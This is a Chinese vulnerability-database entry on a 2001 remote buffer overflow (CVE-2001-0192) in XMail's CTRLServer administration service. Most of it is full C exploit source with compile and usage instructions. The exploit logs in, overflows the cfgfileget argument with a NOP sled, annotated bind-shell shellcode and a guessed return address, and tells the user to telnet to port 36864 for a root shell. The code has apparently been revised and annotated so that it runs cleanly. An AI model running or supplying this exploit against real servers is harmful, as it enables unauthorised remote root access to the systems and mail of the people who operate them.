Xmail CTRLServer缓冲区溢出漏洞
漏洞ID | 1106194 | 漏洞类型 | 缓冲区溢出 |
发布时间 | 2001-02-01 | 更新时间 | 2001-05-03 |
CVE编号 | CVE-2001-0192 |
CNNVD-ID | CNNVD-200105-082 |
漏洞平台 | Linux | CVSS评分 | 10.0 |
|漏洞来源
|漏洞详情
XMail 的 CTRLServer（管理控制服务）存在缓冲区溢出漏洞：cfgfileget 或 domaindel 命令的参数未做边界检查。攻击者可借此以 CTRLServer 进程的权限（据 BID 2360 为 root）远程执行任意代码。需要注意的是，下文的利用程序先用有效的 CTRLServer 账号登录，之后才发送溢出数据，因此利用该漏洞以持有 CTRLServer 凭据为前提。
|漏洞EXP
source: http://www.securityfocus.com/bid/2360/info
XMail's CTRLServer (the administrative control service) does not bounds-check the argument passed to the cfgfileget command. An over-long argument overflows a fixed-size buffer; the exploit below overwrites a saved return address with a guessed stack address, and a successful guess yields remote code execution with root privilege. Note that the exploit first authenticates to CTRLServer with a valid account before sending the overflow, so valid CTRLServer credentials are a prerequisite.
/*
* XMail CTRLServer remote root exploit for linux/x86
*
* Author: isno([email protected]), 01/2001
*
* NOTE:
* Because the buffer is too small to place many NOPs in front of the
* shellcode, the return address is hard to guess. The offset also cannot be
* brute-forced: once the overflow is sent to the CTRLServer, XMail crashes.
*
*
* Tested on:
* RedHat Linux 6.0 i386 XMail 0.65
*
* Compile:
* gcc -o xmailx xmailx.c
*
* Usage:
* ./xmailx username passwd targethost [offset]
* and telnet targethost 36864
*
*/
#include <errno.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#define BSIZE 512
#define RETADDRESS 0xbc7fe988 /* maybe 0xbffff9a4 in some box */
#define OFFSET 20
#define NOP 0x90
#define PORT 6017
void usage(char *app);
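/*
 * Linux/x86 bind-shell shellcode, 128 bytes, containing no 0x00 byte (it
 * travels inside a C string, so a NUL would truncate it).
 *
 * Flow: the jmp/call pair leaves the address of the trailing "/bin/sh" in
 * %esi, which is then used as scratch space for the socket arguments.
 * socket(), bind(), listen() and accept() all go through the socketcall
 * multiplexer (int 0x80 with %al = 0x66, call number in %ebx).  The bound
 * port is written as the two bytes 0x90 0x00 at 0x16(%esi), i.e. 0x9000 =
 * 36864 in network byte order.  The accepted client is dup2()'d onto
 * fds 0, 1 and 2 and execve("/bin/sh") is called.
 *
 * The original listing had its "\x" escapes stripped by the web extraction;
 * they are restored here byte for byte from the assembly comments.
 */
char shellcode[] =
/* main: */
"\xeb\x72"               /* jmp callz */
/* start: */
"\x5e"                   /* popl %esi */
/* socket() */
"\x29\xc0"               /* subl %eax, %eax */
"\x89\x46\x10"           /* movl %eax, 0x10(%esi) */
"\x40"                   /* incl %eax */
"\x89\xc3"               /* movl %eax, %ebx */
"\x89\x46\x0c"           /* movl %eax, 0x0c(%esi) */
"\x40"                   /* incl %eax */
"\x89\x46\x08"           /* movl %eax, 0x08(%esi) */
"\x8d\x4e\x08"           /* leal 0x08(%esi), %ecx */
"\xb0\x66"               /* movb $0x66, %al */
"\xcd\x80"               /* int $0x80 */
/* bind() */
"\x43"                   /* incl %ebx */
"\xc6\x46\x10\x10"       /* movb $0x10, 0x10(%esi) */
"\x66\x89\x5e\x14"       /* movw %bx, 0x14(%esi) */
"\x88\x46\x08"           /* movb %al, 0x08(%esi) */
"\x29\xc0"               /* subl %eax, %eax */
"\x89\xc2"               /* movl %eax, %edx */
"\x89\x46\x18"           /* movl %eax, 0x18(%esi) */
"\xb0\x90"               /* movb $0x90, %al */
"\x66\x89\x46\x16"       /* movw %ax, 0x16(%esi) -> port 0x9000 (36864) */
"\x8d\x4e\x14"           /* leal 0x14(%esi), %ecx */
"\x89\x4e\x0c"           /* movl %ecx, 0x0c(%esi) */
"\x8d\x4e\x08"           /* leal 0x08(%esi), %ecx */
"\xb0\x66"               /* movb $0x66, %al */
"\xcd\x80"               /* int $0x80 */
/* listen() */
"\x89\x5e\x0c"           /* movl %ebx, 0x0c(%esi) */
"\x43"                   /* incl %ebx */
"\x43"                   /* incl %ebx */
"\xb0\x66"               /* movb $0x66, %al */
"\xcd\x80"               /* int $0x80 */
/* accept() */
"\x89\x56\x0c"           /* movl %edx, 0x0c(%esi) */
"\x89\x56\x10"           /* movl %edx, 0x10(%esi) */
"\xb0\x66"               /* movb $0x66, %al */
"\x43"                   /* incl %ebx */
"\xcd\x80"               /* int $0x80 */
/* dup2(s, 0); dup2(s, 1); dup2(s, 2); */
"\x86\xc3"               /* xchgb %al, %bl */
"\xb0\x3f"               /* movb $0x3f, %al */
"\x29\xc9"               /* subl %ecx, %ecx */
"\xcd\x80"               /* int $0x80 */
"\xb0\x3f"               /* movb $0x3f, %al */
"\x41"                   /* incl %ecx */
"\xcd\x80"               /* int $0x80 */
"\xb0\x3f"               /* movb $0x3f, %al */
"\x41"                   /* incl %ecx */
"\xcd\x80"               /* int $0x80 */
/* execve() */
"\x88\x56\x07"           /* movb %dl, 0x07(%esi) -> terminates "/bin/sh" */
"\x89\x76\x0c"           /* movl %esi, 0x0c(%esi) */
"\x87\xf3"               /* xchgl %esi, %ebx */
"\x8d\x4b\x0c"           /* leal 0x0c(%ebx), %ecx */
"\xb0\x0b"               /* movb $0x0b, %al */
"\xcd\x80"               /* int $0x80 */
/* callz: */
"\xe8\x89\xff\xff\xff"   /* call start */
"/bin/sh";
/* 128 bytes */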
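/*
 * Read one CTRLServer reply into dst and NUL-terminate it.
 * read() does not terminate the buffer; the original code passed the raw
 * bytes to strstr()/fprintf("%s"), which over-reads on a full buffer.
 * Returns the byte count, or -1 on EOF/error (dst is then "").
 */
static ssize_t read_reply(int skt, char *dst, size_t dstlen)
{
    ssize_t n;

    if (dstlen == 0)
        return -1;
    n = read(skt, dst, dstlen - 1);
    if (n <= 0) {
        dst[0] = '\0';
        return -1;
    }
    dst[n] = '\0';
    return n;
}

/*
 * Resolve target (dotted quad or host name) into *out.
 * Returns 0 on success, -1 if it cannot be resolved.  As in the original,
 * the dotted quad 255.255.255.255 is indistinguishable from INADDR_NONE
 * and falls through to the name lookup.
 */
static int resolve_target(const char *target, struct in_addr *out)
{
    struct hostent *host;

    out->s_addr = inet_addr(target);
    if (out->s_addr != INADDR_NONE)
        return 0;

    host = gethostbyname(target);
    if (host == NULL || host->h_addrtype != AF_INET
        || host->h_length != (int)sizeof *out || host->h_addr_list[0] == NULL)
        return -1;
    memcpy(out, host->h_addr_list[0], sizeof *out);
    return 0;
}

/*
 * Fill buff (BSIZE + 1 bytes) with the overflow string:
 *   [0, 260 - len(shellcode))   NOP sled
 *   [.., 260)                   shellcode (128 bytes -> sled is 132 bytes)
 *   [260, 512)                  63 copies of ret, host byte order
 *   [512]                       NUL, so buff can be appended as a C string
 * The original wrote ' ' instead of '\0' at index BSIZE, so strcat() read
 * past the end of buff.  The int store through a cast pointer is replaced
 * by memcpy (same bytes, no alignment/aliasing UB).
 * Returns -1 if the shellcode does not fit or if ret contains a 0x00
 * byte, which the string-based transport would truncate.
 */
static int build_payload(char *buff, uint32_t ret)
{
    unsigned char raw[sizeof ret];
    size_t sclen = strlen(shellcode);
    size_t sled;
    size_t i;

    if (sclen > 256 + 4)
        return -1;
    memcpy(raw, &ret, sizeof ret);
    for (i = 0; i < sizeof ret; i++)
        if (raw[i] == 0)
            return -1;

    sled = 256 + 4 - sclen;
    memset(buff, NOP, BSIZE);
    memcpy(buff + sled, shellcode, sclen);
    for (i = 256 + 4; i + sizeof ret <= BSIZE; i += sizeof ret)
        memcpy(buff + i, &ret, sizeof ret);
    buff[BSIZE] = '\0';
    return 0;
}

/*
 * Entry point: ./xmailx username passwd targethost [offset]
 *
 * Connects to the CTRLServer on TCP PORT, logs in with the supplied
 * account (commands are TAB-separated and CRLF-terminated), and sends the
 * overflowing "cfgfileget" command built by build_payload().  The return
 * address is RETADDRESS minus offset (default OFFSET).  On success the
 * bind shell listens on port 36864.
 *
 * Returns 0 once the payload has been written (the original returned 1),
 * 1 on usage/argument errors and on any socket, resolution, login or I/O
 * failure (the original exit(-1) became status 255).
 */
int main(int argc, char *argv[])
{
    char buff[BSIZE + 1];
    char sendbuf[600];
    char loginbuf[200];
    char rcvbuf[1024];
    const char *username;
    const char *password;
    const char *target;
    long offset = OFFSET;
    uint32_t ret;
    int skt;
    int n;
    struct sockaddr_in sin;

    if (argc < 4) {
        usage(argv[0]);
        return 1;
    }
    username = argv[1];
    password = argv[2];
    target = argv[3];

    if (argc > 4) {
        /* strtol instead of atoi so a malformed offset is rejected rather
           than silently becoming 0 */
        char *end;
        errno = 0;
        offset = strtol(argv[4], &end, 10);
        if (end == argv[4] || *end != '\0' || errno == ERANGE) {
            fprintf(stderr, "Bad offset '%s'\n", argv[4]);
            return 1;
        }
    }
    /* 32-bit modular arithmetic, as u_long gave on the original i386 box */
    ret = (uint32_t)(RETADDRESS - (uint32_t)offset);

    if (build_payload(buff, ret) < 0) {
        fprintf(stderr, "Return address 0x%08x contains a NUL byte; "
                        "choose another offset\n", (unsigned)ret);
        return 1;
    }
    fprintf(stderr, "\nUse retAddress: 0x%08x\n\n", (unsigned)ret);

    /* command TAB argument CRLF; snprintf bounds what strcat did not */
    n = snprintf(sendbuf, sizeof sendbuf, "cfgfileget\t%s\r\n", buff);
    if (n < 0 || (size_t)n >= sizeof sendbuf) {
        fprintf(stderr, "Payload does not fit the send buffer\n");
        return 1;
    }
    /* login line: username TAB password CRLF; argv was copied unbounded
       into the 200-byte loginbuf before */
    n = snprintf(loginbuf, sizeof loginbuf, "%s\t%s\r\n", username, password);
    if (n < 0 || (size_t)n >= sizeof loginbuf) {
        fprintf(stderr, "username/password too long\n");
        return 1;
    }

    memset(&sin, 0, sizeof sin);
    sin.sin_family = AF_INET;
    sin.sin_port = htons(PORT);
    if (resolve_target(target, &sin.sin_addr) < 0) {
        fprintf(stderr, "Cant resolv %s!!\n", target);
        return 1;
    }

    skt = socket(PF_INET, SOCK_STREAM, 0);
    if (skt < 0) {  /* socket() fails with -1, not 0 as the original tested */
        perror("socket()");
        return 1;
    }
    if (connect(skt, (struct sockaddr *)&sin, sizeof sin) < 0) {
        perror("Connect()");
        close(skt);
        return 1;
    }

    /* banner */
    if (read_reply(skt, rcvbuf, sizeof rcvbuf) < 0) {
        fprintf(stderr, "No banner from %s\n", target);
        close(skt);
        return 1;
    }
    fprintf(stderr, "%s\n", rcvbuf);

    fprintf(stderr, "Starting to login...\n");
    if (write(skt, loginbuf, strlen(loginbuf)) != (ssize_t)strlen(loginbuf)) {
        perror("write(login)");
        close(skt);
        return 1;
    }
    sleep(1);
    /* The exploit treats any reply containing "00000" as a successful
       login; everything else aborts.  perror() here reported a stale
       errno, so use a plain message. */
    if (read_reply(skt, rcvbuf, sizeof rcvbuf) < 0
        || strstr(rcvbuf, "00000") == NULL) {
        fprintf(stderr, "Login failed!\n");
        close(skt);
        return 1;
    }

    if (write(skt, sendbuf, strlen(sendbuf)) != (ssize_t)strlen(sendbuf)) {
        perror("write(payload)");
        close(skt);
        return 1;
    }
    close(skt);
    fprintf(stderr, "Success!now telnet %s 36864\n", target);
    return 0;
}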
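/*
 * Print the command-line synopsis to stderr.
 * app is argv[0].  The "\n" escapes were lost in the web extraction of the
 * original listing and are restored here.
 */
void usage(char *app)
{
    fprintf(stderr, "\nXMail 0.65/0.66 CTRLSvr exploit\n\n");
    fprintf(stderr, "Usage: %s username passwd targethost [offset]\n\n", app);
}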
|受影响的产品
Davide Libenzi XMail 0.66
|参考资料
来源:xmailserver.org
链接:http://xmailserver.org/XMail-Readme.txt
来源:BUGTRAQ
名称:20010201 XMail CTRLServer remote buffer overflow vulnerability
链接:http://archives.neohapsis.com/archives/bugtraq/2001-02/0047.html